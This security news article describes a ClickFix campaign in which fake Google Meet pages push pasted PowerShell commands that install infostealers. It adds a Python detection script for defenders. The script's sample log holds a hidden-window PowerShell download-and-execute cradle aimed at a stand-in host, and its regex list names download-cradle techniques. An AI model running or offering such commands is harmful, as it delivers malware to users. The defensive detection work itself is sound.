A new ClickFix campaign is redirecting targeted users to fake Google Meet landing pages that display bogus connectivity problems. Researchers report that the campaign's primary objective is to deploy information-stealing malware on both Windows and macOS.
ClickFix is a social engineering tactic that emerged earlier this year. TA571 used it in messages that displayed fake error notices for Chrome, Word, and OneDrive. The notices tricked victims into copying a PowerShell "fix" to the clipboard and pasting it into a Windows Command Prompt or PowerShell window, supposedly to resolve the problem.
In reality, running that command infected the victim's PC with one of several malware families, including DarkGate, Amadey Loader, XMRig, Matanbuchus, NetSupport, and Lumma Stealer. Researchers also tracked a sharp rise in ClickFix campaigns in July, particularly against US- and Japan-based organisations.
Separate research found that ClickFix has evolved considerably. It now includes a Google Meet lure, phishing emails targeting transport and logistics organisations, fake Facebook pages, and misleading GitHub issues.
Two cybercriminal groups ran some of the latest campaigns that use the tactic; they are thought to be sub-teams of the cryptocurrency scam gangs Marko Polo and CryptoLove.
The Google Meet lure builds on the ClickFix technique.
ClickFix has become a staple for threat actors building bogus Google Meet pages. Because Google Meet is used for virtual meetings, webinars, and everyday online collaboration, the lure is plausible to a very wide range of targets.
The attacker sends emails that look like legitimate Google Meet invitations for a work meeting, conference, or other important event. The links point to domains crafted to resemble real Google Meet URLs. A practical check: a genuine Meet link is hosted on meet.google.com itself, whereas a look-alike typically places "meet" or "google" in a subdomain or path of an attacker-controlled domain, so inspect the registrable domain rather than the start of the URL.
When the recipient opens the bogus page, a pop-up warns of a technical issue and offers a "Try Fix" button. Clicking it starts the standard ClickFix routine: the page copies a PowerShell command to the clipboard and instructs the user to paste and run it in a Windows prompt. That command retrieves the payload from an attacker-controlled domain and executes it, infecting the machine.
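The pasted "fix" leaves a recognisable trace in endpoint telemetry, which is where a defender can catch both the TA571-style lures and the Google Meet variant described above. What follows is an added example, not code from the original report or from any of the research it cites: detection logic run over a few constructed Windows process-creation log lines, plus the URL check for look-alike invitation links. The log format, field names, host and user names, and the domain meet-fix.example.invalid are all constructed for the example.

```python
"""
Added example (not from the original report): flag a ClickFix-style paste in
process-creation telemetry.  The pasted "fix" is a shell launched by the user's
own desktop (parent explorer.exe or a terminal, not a service or scheduler)
whose command line is a download cradle fetching the payload from an
attacker-controlled domain.  All sample data below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlparse

# Shells a ClickFix page tells the victim to paste into.
USER_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Parents that mean a human launched the shell (Run dialog, Start menu, or a
# terminal window).  Services and schedulers spawn PowerShell too, but not here.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}

# Download-and-execute fragments typical of pasted ClickFix commands:
# (label, case-insensitive regex).
CRADLE_PATTERNS = [
    ("web-request",   r"\b(invoke-webrequest|iwr|curl|wget|invoke-restmethod|irm)\b"),
    ("download-call", r"\.download(string|file|data)\s*\("),
    ("iex",           r"\b(invoke-expression|iex)\b"),
    ("mshta-url",     r"\bmshta(\.exe)?\s+[\"']?https?://"),
    ("encoded",       r"(^|\s)-(e|ec|enc|encodedcommand)\s"),
    ("hidden-window", r"(^|\s)-w(indowstyle)?\s+hidden\b"),
    ("bypass-policy", r"(^|\s)-(ep|executionpolicy)\s+bypass\b"),
]
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')   # key=value; values may be quoted


def parse_event(line: str) -> dict:
    """Parse one constructed key=value telemetry line (quoted values may hold spaces)."""
    fields = {}
    for key, raw in KV_RE.findall(line):
        fields[key] = raw[1:-1].replace('\\"', '"') if raw.startswith('"') else raw
    return fields


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    host: str
    user: str
    parent: str
    image: str
    indicators: List[str]   # which cradle patterns matched
    urls: List[str]         # payload URLs to block and hunt for elsewhere


def detect_clickfix(event: dict) -> Optional[Finding]:
    """Flag an interactively launched shell whose command line is a download cradle."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if image not in USER_SHELLS or parent not in INTERACTIVE_PARENTS:
        return None
    cmd = event.get("CommandLine", "")
    hits = [label for label, pat in CRADLE_PATTERNS if re.search(pat, cmd, re.IGNORECASE)]
    if not hits:
        return None
    return Finding(event.get("Computer", "?"), event.get("User", "?"),
                   parent, image, hits, URL_RE.findall(cmd))


def scan(lines: Iterable[str]) -> List[Finding]:
    events = (parse_event(line) for line in lines if line.strip())
    return [f for f in map(detect_clickfix, events) if f is not None]


def is_genuine_meet_link(url: str) -> bool:
    """A real invitation is hosted on meet.google.com itself; look-alikes put
    'meet' or 'google' in a subdomain or path of some other registrable domain."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and (parsed.hostname or "").lower() == "meet.google.com"


# Constructed sample telemetry: two ClickFix-style pastes, one benign command
# from the same user, and one legitimate service-launched PowerShell run.
SAMPLE_LOG = r'''
Computer=WS-0412 User=CORP\jdoe ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -ep bypass -c iex (iwr http://meet-fix.example.invalid/u.ps1 -UseBasicParsing)"
Computer=WS-0412 User=CORP\jdoe ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\cmd.exe CommandLine="cmd /c dir C:\Users\jdoe\Documents"
Computer=WS-0417 User="NT AUTHORITY\SYSTEM" ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -NoProfile -File C:\ProgramData\Patch\inventory.ps1"
Computer=WS-0420 User=CORP\asmith ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
'''

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.host} {f.user}: {f.parent} -> {f.image} {f.indicators} {f.urls}")
```

The parent-process condition is what keeps this rule quiet: PowerShell spawned by svchost.exe, a scheduler or a management agent never reaches the cradle check, while a user-typed command that only lists a directory produces no indicators. In a real deployment the extracted URLs feed proxy and DNS blocking, and the encoded-command case should be decoded and scanned for the same cradle patterns.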
The final Windows payloads are the Stealc and Rhadamanthys infostealers. On macOS, the lure instead delivers the AMOS Stealer as an Apple disk image (.dmg) named 'Launcher_v194'.
Google Meet is in constant use, particularly by corporate employees, so users should be alert to this technique. To avoid falling victim: verify unexpected meeting invitations with the sender through a channel you already trust, check that the link is hosted on meet.google.com, and never paste a command from a web page into a terminal, Command Prompt or Run dialog, whatever "error" it claims to fix. Legitimate products report connectivity problems inside the application itself, not by asking you to run a shell command.